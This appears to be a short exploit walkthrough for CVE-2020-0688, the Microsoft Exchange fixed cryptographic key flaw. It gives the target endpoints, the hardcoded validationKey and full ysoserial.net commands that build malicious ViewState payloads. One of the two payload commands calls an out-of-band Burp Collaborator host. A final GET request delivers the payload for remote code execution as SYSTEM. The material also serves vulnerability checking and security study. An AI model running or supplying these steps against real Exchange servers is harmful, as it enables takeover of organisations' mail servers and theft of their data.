[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic Key Remote Code Execution (RCE)
Instead of having randomly-generated keys on a per-installation basis, all installations of Microsoft Exchange Server have the same validationKey
and decryptionKey
values in web.config. Thus, an authenticated attacker can trick the server into deserializing maliciously crafted ViewState data. With the help of YSoSerial.net, an attacker can execute arbitrary .NET code on the server in the context of the Exchange Control Panel (ECP) web application, which runs as SYSTEM privileges.
Step 1: Visit one of the following endpoints and access to authentication page
- http(s)://exchangeserver/owa
- http(s)://exchangeserver/owa/auth.owa
- http(s)://exchangeserver/owa/auth/logon.aspx
- http(s)://exchangeserver/ecp
- http(s)://exchangeserver/ecp/default.aspx
Step 2: Login with credential (no matter user account privileges), and get valid ASP_NET_SessionId
and __VIEWSTATEGENERATOR
values from HTTP response Cookie and HTTP response body respectively. For example
- ASP_NET_SessionId: 05ae4b41-51e1-4c3a-9241-6b87b169d663
- __VIEWSTATEGENERATOR: B97B4E27
- validationKey (Fixed): CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF
- validationalg (Fixed): SHA1
Step 3: In order to generate payload (to check vuln.), use YSoSerial.net
Note that if you have access to victim exchange server, you can use the following payload which create text file in C:\
directory as PoC.txt
name
PS C:\>ysoserial.net\ysoserial\bin\Release\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo OOOPS!!! > c:/PoC.txt" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy
However, you can't access to server, may following would be better.
PS C:\>ysoserial.net\ysoserial\bin\Release\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "ping xxxxxxxx..burpcollaborator.net" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy
Step 4: After step 4, we'll have had url-encoded ViewState payload. Do GET request at below endpoint as following format
http(s)://exchangeserver/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState_Payload>
Original blogpost available is here